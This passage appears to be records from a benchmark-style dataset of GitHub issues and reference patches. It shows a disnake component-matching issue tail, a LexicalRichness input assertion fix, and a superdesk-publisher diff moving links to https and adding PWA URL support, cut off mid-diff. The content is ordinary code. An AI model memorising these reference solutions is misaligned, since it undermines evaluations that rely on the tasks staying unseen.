To make this even nicer, the decorated function could have a method or function attached that creates a component with the specified parameters, as that would make it easy to send a button or select that the listener matches.
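The kwargs-based "superset" matching described above can be sketched in plain Python. This is a hypothetical, simplified stand-in for the actual `AbstractComponent` comparison in the patch — it matches plain dicts rather than disnake component objects:

```python
def build_matching_check(**kwargs):
    """Return a predicate that is True when a component (here: a dict)
    carries at least the given attribute/value pairs -- a "superset" match,
    as opposed to requiring an exact component match."""

    def check(component: dict) -> bool:
        # Every provided kwarg must be present on the component with the
        # same value; extra attributes on the component are ignored.
        return all(component.get(key) == value for key, value in kwargs.items())

    return check


check = build_matching_check(component_type="button", label="simple_delete")
print(check({"component_type": "button", "label": "simple_delete", "custom_id": "x"}))  # True
print(check({"component_type": "select", "label": "simple_delete"}))  # False
```

The real implementation applies the same idea against `inter.component` on an incoming `disnake.MessageInteraction`.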
| 2022-07-14T22:41:21 | 0.0 | [] | [] |
|||
LSYS/LexicalRichness | LSYS__LexicalRichness-38 | f0087bce069eb953a8e35fa2599c7c35f766dcce | diff --git a/lexicalrichness/lexicalrichness.py b/lexicalrichness/lexicalrichness.py
index 69ffb65..0baa7d9 100644
--- a/lexicalrichness/lexicalrichness.py
+++ b/lexicalrichness/lexicalrichness.py
@@ -181,6 +181,7 @@ def __init__(self, text, preprocessor=preprocess, tokenizer=tokenize):
if self.tokenizer:
self.wordlist = self.tokenizer(text)
else:
+ assert type(text)==list, "If tokenizer is None, then input should be a list of words."
self.wordlist = text
self.words = len(self.wordlist)
diff --git a/setup.py b/setup.py
index 384a951..9b7e862 100644
--- a/setup.py
+++ b/setup.py
@@ -40,5 +40,5 @@
packages=find_packages(include=['lexicalrichness']),
url='https://github.com/LSYS/lexicalrichness',
download_url='https://github.com/LSYS/LexicalRichness/archive/refs/tags/v0.1.9.tar.gz',
- version='0.1.9'
+ version='0.1.10'
)
| Disallow string input when tokenizer is set to None
For custom NLP pipelines, disallow string input when tokenizer is set to None.
Assert that input is a list of words instead of a string.
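The guard added in the patch can be sketched as a small standalone function (a simplified stand-in for the `LexicalRichness` constructor, which also runs a preprocessor; names here are illustrative):

```python
def make_wordlist(text, tokenizer=None):
    """Simplified version of the patched constructor logic: when no
    tokenizer is supplied, the input must already be a list of words,
    not a raw string."""
    if tokenizer:
        return tokenizer(text)
    # Mirrors the assertion introduced in lexicalrichness.py
    assert type(text) == list, "If tokenizer is None, then input should be a list of words."
    return text


print(make_wordlist("a b c", tokenizer=str.split))  # ['a', 'b', 'c']
print(make_wordlist(["a", "b", "c"]))               # ['a', 'b', 'c']
```

Passing a raw string with `tokenizer=None` now raises an `AssertionError` instead of silently iterating over characters.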
| 2022-08-20T08:09:12 | 0.0 | [] | [] |
|||
superdesk/superdesk-publisher | superdesk__superdesk-publisher-326 | 28558110a7ec6e8863ecd11fda7446970b9a5edd | diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml
index e0ff0d30..4e095a88 100644
--- a/.github/workflows/ci.yaml
+++ b/.github/workflows/ci.yaml
@@ -8,7 +8,7 @@ jobs:
strategy:
matrix:
- node-version: [10.x, 12.x, 14.x]
+ node-version: [14.x]
steps:
- name: Set Timezone
diff --git a/client/components/Analytics/ArticleItem.jsx b/client/components/Analytics/ArticleItem.jsx
index e70634a9..5d34e85f 100644
--- a/client/components/Analytics/ArticleItem.jsx
+++ b/client/components/Analytics/ArticleItem.jsx
@@ -44,12 +44,12 @@ const ArticleItem = ({ item, style }) => {
target="_blank"
href={
item.tenant.subdomain
- ? "http://" +
+ ? "https://" +
item.tenant.subdomain +
"." +
item.tenant.domain_name +
item._links.online.href
- : "http://" + item.tenant.domain_name + item._links.online.href
+ : "https://" + item.tenant.domain_name + item._links.online.href
}
>
<i className="icon-external" />
@@ -71,7 +71,7 @@ const ArticleItem = ({ item, style }) => {
ArticleItem.propTypes = {
item: PropTypes.object.isRequired,
- style: PropTypes.object.isRequired
+ style: PropTypes.object.isRequired,
};
export default ArticleItem;
diff --git a/client/components/ContentLists/ListCard.jsx b/client/components/ContentLists/ListCard.jsx
index 4c175d22..ec7bcb55 100644
--- a/client/components/ContentLists/ListCard.jsx
+++ b/client/components/ContentLists/ListCard.jsx
@@ -39,6 +39,9 @@ class ListCard extends React.Component {
? helpers.getUpdatedValues(this.state.list, this.props.list)
: { ...this.state.list };
+ delete list.updated_at;
+ delete list.latest_items;
+
this.props.publisher
.manageList(list, this.state.list.id)
.then((res) => {
@@ -122,6 +125,16 @@ class ListCard extends React.Component {
onChange={this.handleInputChange}
/>
</div>
+ <div className="field">
+ <label htmlFor="listLimit">Description</label>
+ <input
+ type="text"
+ className="line-input"
+ value={this.state.list.description}
+ name="description"
+ onChange={this.handleInputChange}
+ />
+ </div>
<div className="field">
<label htmlFor="listCacheLifeTime">cache lifetime</label>
<input
diff --git a/client/components/Dashboard/Tenant.jsx b/client/components/Dashboard/Tenant.jsx
index c22d5843..582a9fa3 100644
--- a/client/components/Dashboard/Tenant.jsx
+++ b/client/components/Dashboard/Tenant.jsx
@@ -9,11 +9,13 @@ const Tenant = ({ tenant }) => {
<a
target="_blank"
href={
- tenant.output_channel
+ tenant.pwa_config && tenant.pwa_config.url
+ ? tenant.pwa_config.url
+ : tenant.output_channel
? tenant.output_channel.config.url
: tenant.subdomain
- ? "http://" + tenant.subdomain + "." + tenant.domain_name
- : "http://" + tenant.domain_name
+ ? "https://" + tenant.subdomain + "." + tenant.domain_name
+ : "https://" + tenant.domain_name
}
flow="down"
>
@@ -21,6 +23,9 @@ const Tenant = ({ tenant }) => {
<i className="icon-external"></i>
</a>
</h3>
+ {tenant.pwa_config && tenant.pwa_config.url && (
+ <span className="sp-logo-pwa"></span>
+ )}
</div>
<div className="sd-card sd-card--flex-grow">
<div className="dashboard-content-header sd-shadow--z1">
@@ -65,7 +70,7 @@ const Tenant = ({ tenant }) => {
className="sd-card__content"
style={{
maxHeight: "210px",
- overflowY: "auto"
+ overflowY: "auto",
}}
>
<ul className="sd-card__content-list">
@@ -82,7 +87,7 @@ const Tenant = ({ tenant }) => {
<p className="panel-info__description"> </p>
</div>
) : (
- tenant.content_lists.map(list => (
+ tenant.content_lists.map((list) => (
<li
key={list.name + list.id}
className="sd-card__content-list-item sd-card__content-list-item--no-padding"
@@ -107,7 +112,7 @@ const Tenant = ({ tenant }) => {
};
Tenant.propTypes = {
- tenant: PropTypes.object.isRequired
+ tenant: PropTypes.object.isRequired,
};
export default Tenant;
diff --git a/client/components/Output/ArticleItem.jsx b/client/components/Output/ArticleItem.jsx
index b9d4eb6f..f04f9346 100644
--- a/client/components/Output/ArticleItem.jsx
+++ b/client/components/Output/ArticleItem.jsx
@@ -149,14 +149,19 @@ const ArticleItem = ({ item, style, onRemove }) => {
key={`articlestatuslabel_${index}_${article.id}`}
article={article}
url={
- article.tenant
+ article.tenant &&
+ article.tenant.pwa_config &&
+ article.tenant.pwa_config.url
+ ? article.tenant.pwa_config.url +
+ article._links.online.href
+ : article.tenant
? article.tenant.subdomain
- ? "http://" +
+ ? "https://" +
article.tenant.subdomain +
"." +
article.tenant.domain_name +
article._links.online.href
- : "http://" +
+ : "https://" +
article.tenant.domain_name +
article._links.online.href
: null
diff --git a/client/components/Output/Listing.jsx b/client/components/Output/Listing.jsx
index f8bb5073..f8d11a5c 100644
--- a/client/components/Output/Listing.jsx
+++ b/client/components/Output/Listing.jsx
@@ -216,10 +216,18 @@ class Listing extends React.Component {
item.page_views_count = helpers.countPageViews(item.articles);
item.articles.forEach((item) => {
if (item.route && item.status == "published" && item.tenant) {
- let tenantUrl = item.tenant.subdomain
- ? item.tenant.subdomain + "." + item.tenant.domain_name
- : item.tenant.domain_name;
- item.live_url = "http://" + tenantUrl + item._links.online.href;
+ let tenantUrl =
+ item.tenant &&
+ item.tenant.pwa_config &&
+ item.tenant.pwa_config.url
+ ? item.tenant.pwa_config.url
+ : item.tenant.subdomain
+ ? "https://" +
+ item.tenant.subdomain +
+ "." +
+ item.tenant.domain_name
+ : "https://" + item.tenant.domain_name;
+ item.live_url = tenantUrl + item._links.online.href;
}
});
});
diff --git a/client/components/Output/PreviewPane.jsx b/client/components/Output/PreviewPane.jsx
index ff35f472..dedf457b 100644
--- a/client/components/Output/PreviewPane.jsx
+++ b/client/components/Output/PreviewPane.jsx
@@ -18,7 +18,7 @@ class PreviewPane extends React.Component {
this.state = {
package: null,
- loading: true
+ loading: true,
};
}
@@ -42,14 +42,16 @@ class PreviewPane extends React.Component {
loadPackage = () => {
this.setState({ loading: true });
- this.context.publisher.getPackage(this.props.package.id).then(response => {
- if (this._isMounted) {
- this.setState({
- loading: false,
- package: response
- });
- }
- });
+ this.context.publisher
+ .getPackage(this.props.package.id)
+ .then((response) => {
+ if (this._isMounted) {
+ this.setState({
+ loading: false,
+ package: response,
+ });
+ }
+ });
};
render() {
@@ -58,12 +60,11 @@ class PreviewPane extends React.Component {
let slideshows = [];
if (this.state.package && this.state.package.extra_items) {
- this.state.package.extra_items.map(gal => {
+ this.state.package.extra_items.map((gal) => {
if (gal.id === "gallery") {
if (gal.items[1] && Number.isInteger(parseInt(gal.items[1].order))) {
gal.items = _.sortBy(gal.items, "order");
}
-
slideshows.push(gal);
}
});
@@ -77,12 +78,12 @@ class PreviewPane extends React.Component {
let article = {
feature_media:
- this.state.package && this.state.package.feature_media
- ? this.state.package.feature_media
+ this.state.package && this.state.package.featured_media
+ ? this.state.package.featured_media
: null,
updated_at: this.props.package.updated_at,
article_statistics: {
- page_views_number: this.props.package.page_views_count
+ page_views_number: this.props.package.page_views_count,
},
comments_count: this.props.package.comments_count,
title: this.props.package.headline,
@@ -94,7 +95,7 @@ class PreviewPane extends React.Component {
? this.props.package.articles[0].paywall_secured
: false,
articles: this.props.package.articles,
- authors: this.props.package.authors ? this.props.package.authors : []
+ authors: this.props.package.authors ? this.props.package.authors : [],
};
return <ArticlePreview article={article} close={this.props.close} />;
@@ -103,7 +104,7 @@ class PreviewPane extends React.Component {
PreviewPane.propTypes = {
close: PropTypes.func.isRequired,
- package: PropTypes.object
+ package: PropTypes.object,
};
export default PreviewPane;
diff --git a/client/components/Output/PublishPane/Preview.jsx b/client/components/Output/PublishPane/Preview.jsx
index 006c7f0d..b09b24d2 100644
--- a/client/components/Output/PublishPane/Preview.jsx
+++ b/client/components/Output/PublishPane/Preview.jsx
@@ -28,13 +28,20 @@ class Preview extends React.Component {
let token = this.context.publisher.getToken();
let destination = this.props.item;
- let tenantUrl = destination.tenant.subdomain
- ? destination.tenant.subdomain + "." + destination.tenant.domain_name
- : destination.tenant.domain_name;
+ console.log(destination);
+
+ let tenantUrl =
+ destination.tenant.pwa_config && destination.tenant.pwa_config.url
+ ? destination.tenant.pwa_config.url
+ : destination.tenant.subdomain
+ ? "//" +
+ destination.tenant.subdomain +
+ "." +
+ destination.tenant.domain_name
+ : "//" + destination.tenant.domain_name;
let urls = {
regular:
- "//" +
tenantUrl +
"/preview/package/" +
destination.route.id +
@@ -43,7 +50,6 @@ class Preview extends React.Component {
"?auth_token=" +
token,
amp:
- "//" +
tenantUrl +
"/preview/package/" +
destination.route.id +
diff --git a/client/components/Output/PublishPane/PublishPane.jsx b/client/components/Output/PublishPane/PublishPane.jsx
index d3687f14..8a5a8902 100644
--- a/client/components/Output/PublishPane/PublishPane.jsx
+++ b/client/components/Output/PublishPane/PublishPane.jsx
@@ -77,9 +77,12 @@ class PublishPane extends React.Component {
});
if (tenant && item.route) {
- let tenantUrl = tenant.subdomain
- ? tenant.subdomain + "." + tenant.domain_name
- : tenant.domain_name;
+ let tenantUrl =
+ tenant.pwa_config && tenant.pwa_config.url
+ ? tenant.pwa_config.url
+ : tenant.subdomain
+ ? "https://" + tenant.subdomain + "." + tenant.domain_name
+ : "https://" + tenant.domain_name;
destinations.push({
tenant: tenant,
@@ -93,7 +96,7 @@ class PublishPane extends React.Component {
slug: item.slug,
live_url:
item.status === "published"
- ? "http://" + tenantUrl + item._links.online.href
+ ? tenantUrl + item._links.online.href
: null,
});
}
diff --git a/client/components/Output/Swimlane/TenantBoard.jsx b/client/components/Output/Swimlane/TenantBoard.jsx
index a74e8898..7b2c57e3 100644
--- a/client/components/Output/Swimlane/TenantBoard.jsx
+++ b/client/components/Output/Swimlane/TenantBoard.jsx
@@ -127,10 +127,18 @@ class TenantBoard extends React.Component {
item.page_views_count = helpers.countPageViews(item.articles);
item.articles.forEach((item) => {
if (item.route && item.status == "published" && item.tenant) {
- let tenantUrl = item.tenant.subdomain
- ? item.tenant.subdomain + "." + item.tenant.domain_name
- : item.tenant.domain_name;
- item.live_url = "http://" + tenantUrl + item._links.online.href;
+ let tenantUrl =
+ item.tenant &&
+ item.tenant.pwa_config &&
+ item.tenant.pwa_config.url
+ ? item.tenant.pwa_config.url
+ : item.tenant.subdomain
+ ? "https://" +
+ item.tenant.subdomain +
+ "." +
+ item.tenant.domain_name
+ : "https://" + item.tenant.domain_name;
+ item.live_url = tenantUrl + item._links.online.href;
}
});
});
diff --git a/client/components/TargetedPublishing/AddWebsite.jsx b/client/components/TargetedPublishing/AddWebsite.jsx
index 26c6dbdb..f1336212 100644
--- a/client/components/TargetedPublishing/AddWebsite.jsx
+++ b/client/components/TargetedPublishing/AddWebsite.jsx
@@ -87,21 +87,15 @@ class AddWebsite extends React.Component {
<div style={{ padding: "1.5rem" }}>
<h3 className="tp-dropdown-heading">Add Website</h3>
<ul className="simple-list--dotted simple-list">
- {remainingSites.map((site) => {
- let siteDomain = site.subdomain
- ? site.subdomain + "." + site.domain_name
- : site.domain_name;
-
- return (
- <li
- key={site.id}
- className="simple-list__item tp-dropdown-li"
- onClick={() => this.addDestination(site)}
- >
- {siteDomain}
- </li>
- );
- })}
+ {remainingSites.map((site) => (
+ <li
+ key={site.id}
+ className="simple-list__item tp-dropdown-li"
+ onClick={() => this.addDestination(site)}
+ >
+ {site.name}
+ </li>
+ ))}
</ul>
</div>
</div>
diff --git a/client/components/TargetedPublishing/Destination.jsx b/client/components/TargetedPublishing/Destination.jsx
index 6e174d58..6f7d0bcf 100644
--- a/client/components/TargetedPublishing/Destination.jsx
+++ b/client/components/TargetedPublishing/Destination.jsx
@@ -9,9 +9,6 @@ import { Label, IconButton } from "superdesk-ui-framework/react";
import ContentLists from "./ContentLists";
import RouteSelect from "./RouteSelect";
import PublishingOptionSwitches from "../generic/PublishingOptionSwitches";
-
-import SaveBar from "../UI/SaveBar";
-
class Destination extends Component {
constructor(props) {
super(props);
@@ -21,6 +18,8 @@ class Destination extends Component {
const protocol = pubConfig.protocol || "https";
let subdomain = null;
let domainName = null;
+ let pwaUrl = null;
+ let siteName = null;
let hasOutputChannel = false;
let hasFbiaEnabled = false;
let hasPaywallEnabled = false;
@@ -50,6 +49,11 @@ class Destination extends Component {
hasOutputChannel = props.site.output_channel;
subdomain = props.site.subdomain ? props.site.subdomain : "";
domainName = props.site.domain_name;
+ siteName = props.site.name;
+ pwaUrl =
+ props.site.pwa_config && props.site.pwa_config.url
+ ? props.site.pwa_config.url
+ : null;
} else if (props.rule) {
destination.tenant = props.rule.tenant.code;
destination.route = props.rule.route ? props.rule.route.id : null;
@@ -74,6 +78,11 @@ class Destination extends Component {
? props.rule.tenant.subdomain
: "";
domainName = props.rule.tenant.domain_name;
+ siteName = props.rule.tenant.name;
+ pwaUrl =
+ props.rule.tenant.pwa_config && props.rule.tenant.pwa_config.url
+ ? props.rule.tenant.pwa_config.url
+ : null;
}
}
@@ -88,6 +97,8 @@ class Destination extends Component {
: "",
subdomain: subdomain ? subdomain : "",
domainName: domainName ? domainName : "",
+ pwaUrl: pwaUrl,
+ siteName: siteName ? siteName : "",
hasOutputChannel: hasOutputChannel ? hasOutputChannel : false,
hasPaywallEnabled: hasPaywallEnabled ? hasPaywallEnabled : false,
hasAppleNewsEnabled: hasAppleNewsEnabled ? true : false,
@@ -122,6 +133,8 @@ class Destination extends Component {
const protocol = pubConfig.protocol || "https";
let subdomain = null;
let domainName = null;
+ let pwaUrl = null;
+ let siteName = null;
let hasOutputChannel = false;
let hasFbiaEnabled = false;
let hasPaywallEnabled = false;
@@ -138,6 +151,11 @@ class Destination extends Component {
hasOutputChannel = props.site.output_channel;
subdomain = props.site.subdomain ? props.site.subdomain : "";
domainName = props.site.domain_name;
+ siteName = props.site.name;
+ pwaUrl =
+ props.site.pwa_config && props.site.pwa_config.url
+ ? props.site.pwa_config.url
+ : null;
} else if (props.rule) {
destination.tenant = props.rule.tenant.code;
destination.route = props.rule.route ? props.rule.route.id : null;
@@ -162,6 +180,11 @@ class Destination extends Component {
? props.rule.tenant.subdomain
: "";
domainName = props.rule.tenant.domain_name;
+ siteName = props.rule.tenant.name;
+ pwaUrl =
+ props.rule.tenant.pwa_config && props.rule.tenant.pwa_config.url
+ ? props.rule.tenant.pwa_config.url
+ : null;
}
this.setState(
@@ -172,6 +195,8 @@ class Destination extends Component {
}${domainName}/api/v2/`,
subdomain: subdomain,
domainName: domainName,
+ pwaUrl: pwaUrl,
+ siteName: siteName,
hasOutputChannel: hasOutputChannel,
hasPaywallEnabled: hasPaywallEnabled,
hasAppleNewsEnabled: hasAppleNewsEnabled,
@@ -209,8 +234,17 @@ class Destination extends Component {
{ headers: this.props.apiHeader }
)
.then((res) => {
+ let previewUrl = res.data.preview_url;
+
+ if (this.state.pwaUrl) {
+ const regex = /preview\/publish\/package\/([a-zA-Z0-9]+)/gm;
+ const match = regex.exec(previewUrl);
+
+ previewUrl = this.state.pwaUrl + "/preview/token/" + match[1];
+ }
+
this.setState({
- previewUrl: res.data.preview_url,
+ previewUrl: previewUrl,
});
return res;
});
@@ -301,10 +335,6 @@ class Destination extends Component {
render() {
if (this.state.deleted) return null;
-
- let siteDomain = this.state.subdomain
- ? this.state.subdomain + "." + this.state.domainName
- : this.state.domainName;
const destination = { ...this.state.destination };
let contentListsNames = "";
@@ -360,7 +390,7 @@ class Destination extends Component {
<div className="sd-list-item__row">
<span className="sd-overflow-ellipsis sd-list-item--element-grow">
<span className="sd-list-item__text-strong">
- {siteDomain}
+ {this.state.siteName}
</span>
</span>
</div>
@@ -405,7 +435,7 @@ class Destination extends Component {
<div className="sd-list-item__column sd-list-item__column--grow sd-list-item__column--no-border">
<div className="sd-list-item__row">
<span className="sd-overflow-ellipsis sd-list-item--element-grow sd-list-item__text-strong">
- {siteDomain}
+ {this.state.siteName}
</span>
{preview}
</div>
diff --git a/client/components/generic/PreviewStatusLabels.jsx b/client/components/generic/PreviewStatusLabels.jsx
index ea78aed5..d24657f6 100644
--- a/client/components/generic/PreviewStatusLabels.jsx
+++ b/client/components/generic/PreviewStatusLabels.jsx
@@ -27,14 +27,19 @@ const PreviewStatusLabels = ({ articles }) => {
article={article}
style={{ marginRight: ".6em" }}
url={
- article.tenant
+ article.tenant &&
+ article.tenant.pwa_config &&
+ article.tenant.pwa_config.url
+ ? article.tenant.pwa_config.url +
+ article._links.online.href
+ : article.tenant
? article.tenant.subdomain
- ? "http://" +
+ ? "https://" +
article.tenant.subdomain +
"." +
article.tenant.domain_name +
article._links.online.href
- : "http://" +
+ : "https://" +
article.tenant.domain_name +
article._links.online.href
: null
diff --git a/client/controllers/WebPublisherDashboardController.js b/client/controllers/WebPublisherDashboardController.js
index 6659ca8c..51c917d4 100644
--- a/client/controllers/WebPublisherDashboardController.js
+++ b/client/controllers/WebPublisherDashboardController.js
@@ -10,20 +10,15 @@ import React from "react";
import ReactDOM from "react-dom";
import Dashboard from "../components/Dashboard/Dashboard";
-WebPublisherDashboardController.$inject = [
- "publisher"
-];
-export function WebPublisherDashboardController(
- publisher
-) {
+WebPublisherDashboardController.$inject = ["publisher"];
+export function WebPublisherDashboardController(publisher) {
class WebPublisherDashboard {
constructor() {
this.publisher = publisher;
+ this.publisher.setTenant();
ReactDOM.render(
- <Dashboard
- publisher={this.publisher}
- />,
+ <Dashboard publisher={this.publisher} />,
document.getElementById("sp-dashboard-react-app")
);
}
diff --git a/client/controllers/WebPublisherErrorLogController.js b/client/controllers/WebPublisherErrorLogController.js
index 64874577..0c124fa9 100644
--- a/client/controllers/WebPublisherErrorLogController.js
+++ b/client/controllers/WebPublisherErrorLogController.js
@@ -10,20 +10,15 @@ import React from "react";
import ReactDOM from "react-dom";
import ErrorLog from "../components/ErrorLog/ErrorLog";
-WebPublisherErrorLogController.$inject = [
- "publisher"
-];
-export function WebPublisherErrorLogController(
- publisher
-) {
+WebPublisherErrorLogController.$inject = ["publisher"];
+export function WebPublisherErrorLogController(publisher) {
class WebPublisherErrorLog {
constructor() {
this.publisher = publisher;
+ this.publisher.setTenant();
ReactDOM.render(
- <ErrorLog
- publisher={this.publisher}
- />,
+ <ErrorLog publisher={this.publisher} />,
document.getElementById("sp-error-log-react-app")
);
}
diff --git a/client/controllers/WebPublisherOutputController.js b/client/controllers/WebPublisherOutputController.js
index 277519f4..1bebbfd0 100644
--- a/client/controllers/WebPublisherOutputController.js
+++ b/client/controllers/WebPublisherOutputController.js
@@ -18,7 +18,7 @@ WebPublisherOutputController.$inject = [
"vocabularies",
"notify",
"config",
- "api"
+ "api",
];
export function WebPublisherOutputController(
$scope,
@@ -34,14 +34,19 @@ export function WebPublisherOutputController(
this.editorOpen = false;
let isLanguagesEnabled = false;
- vocabularies.getVocabularies().then(res => {
- let languages = res.find(v => v._id === "languages");
- languages = languages && languages.items ? languages.items.filter(l => l.is_active) : [];
+ vocabularies.getVocabularies().then((res) => {
+ let languages = res.find((v) => v._id === "languages");
+ languages =
+ languages && languages.items
+ ? languages.items.filter((l) => l.is_active)
+ : [];
if (languages.length > 1) {
isLanguagesEnabled = true;
}
+ publisher.setTenant();
+
ReactDOM.render(
React.createElement(Output, {
publisher: publisher,
@@ -50,21 +55,19 @@ export function WebPublisherOutputController(
authoringWorkspace: authoringWorkspace,
api: api,
isLanguagesEnabled: isLanguagesEnabled,
- languages: languages
+ languages: languages,
}),
document.getElementById("sp-output-react-app")
);
- })
+ });
- $scope.$watch(authoringWorkspace.getState, state => {
+ $scope.$watch(authoringWorkspace.getState, (state) => {
this.editorOpen = state && state.item ? true : false;
let event = new CustomEvent("isSuperdeskEditorOpen", {
- detail: this.editorOpen
+ detail: this.editorOpen,
});
document.dispatchEvent(event);
});
-
-
}
}
diff --git a/client/controllers/WebPublisherSettingsController.js b/client/controllers/WebPublisherSettingsController.js
index 39bf1a7f..64a0cbbc 100644
--- a/client/controllers/WebPublisherSettingsController.js
+++ b/client/controllers/WebPublisherSettingsController.js
@@ -13,7 +13,7 @@ WebPublisherSettingsController.$inject = [
"vocabularies",
"$sce",
"notify",
- "api"
+ "api",
];
export function WebPublisherSettingsController(
$scope,
@@ -33,9 +33,12 @@ export function WebPublisherSettingsController(
this.isLanguagesEnabled = false;
- vocabularies.getVocabularies().then(res => {
- this.languages = res.find(v => v._id === "languages");
- this.languages = this.languages && this.languages.items ? this.languages.items.filter(l => l.is_active) : [];
+ vocabularies.getVocabularies().then((res) => {
+ this.languages = res.find((v) => v._id === "languages");
+ this.languages =
+ this.languages && this.languages.items
+ ? this.languages.items.filter((l) => l.is_active)
+ : [];
if (this.languages.length > 1) {
this.isLanguagesEnabled = true;
@@ -48,33 +51,34 @@ export function WebPublisherSettingsController(
publisher
.setToken()
.then(publisher.querySites)
- .then(sites => {
+ .then((sites) => {
this.sites = sites;
$scope.mainLoading = false;
// loading routes
angular.forEach(this.sites, (siteObj, key) => {
publisher.setTenant(siteObj);
- publisher.queryRoutes({ type: "collection" }).then(routes => {
+ publisher.queryRoutes({ type: "collection" }).then((routes) => {
siteObj.routes = routes;
});
});
+ publisher.setTenant();
// rules panel is default
this.changePanel("tenant");
});
}
loadAuthors(page = 0) {
-
- api.users.query({
- max_results: 200,
- page: page,
- sort: '[("first_name", 1), ("last_name", 1)]',
- where: {
- is_support: { $ne: true }
- }
- })
- .then(response => {
- let authors = response._items.filter(item => item.is_author);
+ api.users
+ .query({
+ max_results: 200,
+ page: page,
+ sort: '[("first_name", 1), ("last_name", 1)]',
+ where: {
+ is_support: { $ne: true },
+ },
+ })
+ .then((response) => {
+ let authors = response._items.filter((item) => item.is_author);
if (authors.length) this.authors = [...this.authors, ...authors];
if (response._links.next) this.loadAuthors(page + 1);
@@ -117,7 +121,7 @@ export function WebPublisherSettingsController(
/**
* @ngdoc method
* @name WebPublisherSettingsController#toggleSiteWizard
- * @param {String} outputChannelType - channel type (eg wordpress, drupal)
+ * @param {String} outputChannelType - channel type (eg wordpress, drupal, PWA)
* @description Toggles site creation wizard
*/
toggleSiteWizard(outputChannelType) {
@@ -145,8 +149,8 @@ export function WebPublisherSettingsController(
case "routes":
this.routeType = "";
// getting only route redirects to fill route objects
- this.redirectType = "route";
- this.loadRedirects(true, 100000).then(redirects => this._refreshRoutes(redirects));
+ this.redirectType = "";
+ this._refreshRoutes();
break;
case "redirects":
@@ -211,11 +215,12 @@ export function WebPublisherSettingsController(
publisher
.manageWebhook(_.pick(newWebhook, updatedKeys), this.selectedWebhook.id)
- .then(webhook => {
+ .then((webhook) => {
this.webhookPaneOpen = false;
this.selectedWebhook = {};
this._refreshWebhooks();
- }).catch(err => {
+ })
+ .catch((err) => {
$scope.loading = false;
let message = err.data.message
? err.data.message
@@ -238,7 +243,7 @@ export function WebPublisherSettingsController(
this._refreshWebhooks();
})
)
- .catch(err => {
+ .catch((err) => {
let message = err.data.message
? err.data.message
: "Something went wrong. Try again.";
@@ -253,7 +258,7 @@ export function WebPublisherSettingsController(
*/
_refreshWebhooks() {
$scope.loading = true;
- publisher.getWebhooks().then(webhooks => {
+ publisher.getWebhooks().then((webhooks) => {
this.webhooks = webhooks;
$scope.loading = false;
});
@@ -290,9 +295,9 @@ export function WebPublisherSettingsController(
const regex = /\/{([a-zA-Z0-9]*)}/gm;
let match = regex.exec($scope.newRoute.variable_pattern);
- $scope.newRoute.variableName = match[1] ? match[1] : '';
+ $scope.newRoute.variableName = match[1] ? match[1] : "";
- delete $scope.newRoute.requirements
+ delete $scope.newRoute.requirements;
delete $scope.newRoute.variable_pattern;
}
@@ -307,21 +312,20 @@ export function WebPublisherSettingsController(
* @description Saving route
*/
saveRoute() {
-
if ($scope.newRoute.type === "custom") {
- $scope.newRoute.variable_pattern = "/{" + $scope.newRoute.variableName + "}";
+ $scope.newRoute.variable_pattern =
+ "/{" + $scope.newRoute.variableName + "}";
$scope.newRoute.requirements = [
{
- "key": $scope.newRoute.variableName,
- "value": "[a-zA-Z\\-_]+"
- }
+ key: $scope.newRoute.variableName,
+ value: "[a-zA-Z\\-_]+",
+ },
];
delete $scope.newRoute.variableName;
}
-
let updatedKeys = this._updatedKeys($scope.newRoute, this.selectedRoute);
// only for updating, parent is received as object but for update id is needed
@@ -334,7 +338,7 @@ export function WebPublisherSettingsController(
_.pick($scope.newRoute, updatedKeys),
this.selectedRoute.id
)
- .then(route => {
+ .then((route) => {
this.paneOpen = false;
this._refreshRoutes();
});
@@ -354,7 +358,7 @@ export function WebPublisherSettingsController(
this._refreshRoutes();
})
)
- .catch(err => {
+ .catch((err) => {
let message = err.data.message
? err.data.message
: "Something went wrong. Try again.";
@@ -394,7 +398,7 @@ export function WebPublisherSettingsController(
if (removedItem) {
removedItem.removed = true;
- parent.children = parent.children.filter(item => !item.removed);
+ parent.children = parent.children.filter((item) => !item.removed);
}
} else if (!item.parent) {
// item was top level and was moved to other list
@@ -403,7 +407,7 @@ export function WebPublisherSettingsController(
if (removedItem) {
removedItem.removed = true;
$scope.routes.children = $scope.routes.children.filter(
- item => !item.removed
+ (item) => !item.removed
);
}
}
@@ -412,7 +416,7 @@ export function WebPublisherSettingsController(
.slice(0, index)
.concat(item)
.concat(list.children.slice(index))
- .filter(item => !item.removed);
+ .filter((item) => !item.removed);
let parentId = list.children[0].parent;
let newPosition = list.children.indexOf(item);
@@ -435,55 +439,49 @@ export function WebPublisherSettingsController(
* @ngdoc method
* @name WebPublisherSettingsController#_refreshRoutes
* @private
- * @param {Array} redirects - list of redirects
* @description Loads list of routes
*/
- _refreshRoutes(redirects) {
+ _refreshRoutes() {
$scope.loading = true;
- publisher.queryRoutes().then(routes => {
+ publisher.queryRoutes().then((routes) => {
$scope.loading = false;
let filteredRoutes = { children: null };
if (this.routeType === "content") {
filteredRoutes.children = routes.filter(
- item => item.type === "content"
+ (item) => item.type === "content"
);
} else if (this.routeType === "collection") {
filteredRoutes.children = routes
- .filter(item => item.type === "collection")
- .filter(item => !item.parent);
+ .filter((item) => item.type === "collection")
+ .filter((item) => !item.parent);
} else {
- filteredRoutes.children = routes.filter(item => !item.parent);
+ filteredRoutes.children = routes.filter((item) => !item.parent);
}
- if (redirects && redirects.length) {
- filteredRoutes.children.forEach(route => {
- let routeRedirect = redirects.find(r => {
- return r.route_source.id === route.id
- }
- );
- if (routeRedirect) route.redirect = routeRedirect;
- })
- }
$scope.routes = filteredRoutes;
+ $scope.routes_flat = this._flattenTree(filteredRoutes);
});
}
// ---------------------------------- REDIRECTS
/**
- * @ngdoc method
- * @name WebPublisherSettingsController#toogleCreateRedirect
- * @param {Boolean} paneOpen - should pane be open
- * @param {String} kind - type of redirect
- * @description Opens window for creating new redirect
- */
- toggleCreateRedirect(paneOpen, kind = 'route') {
+ * @ngdoc method
+   * @name WebPublisherSettingsController#toggleCreateRedirect
+ * @param {Boolean} paneOpen - should pane be open
+ * @param {String} kind - type of redirect
+ * @description Opens window for creating new redirect
+ */
+ toggleCreateRedirect(paneOpen, kind = "route") {
this.selectedRedirect = {};
$scope.newRedirect = { kind: kind, permanent: "true" };
this.paneOpen = paneOpen;
}
onChangeRedirectKind() {
- $scope.newRedirect = { kind: $scope.newRedirect.kind, permanent: $scope.newRedirect.permanent };
+ $scope.newRedirect = {
+ kind: $scope.newRedirect.kind,
+ permanent: $scope.newRedirect.permanent,
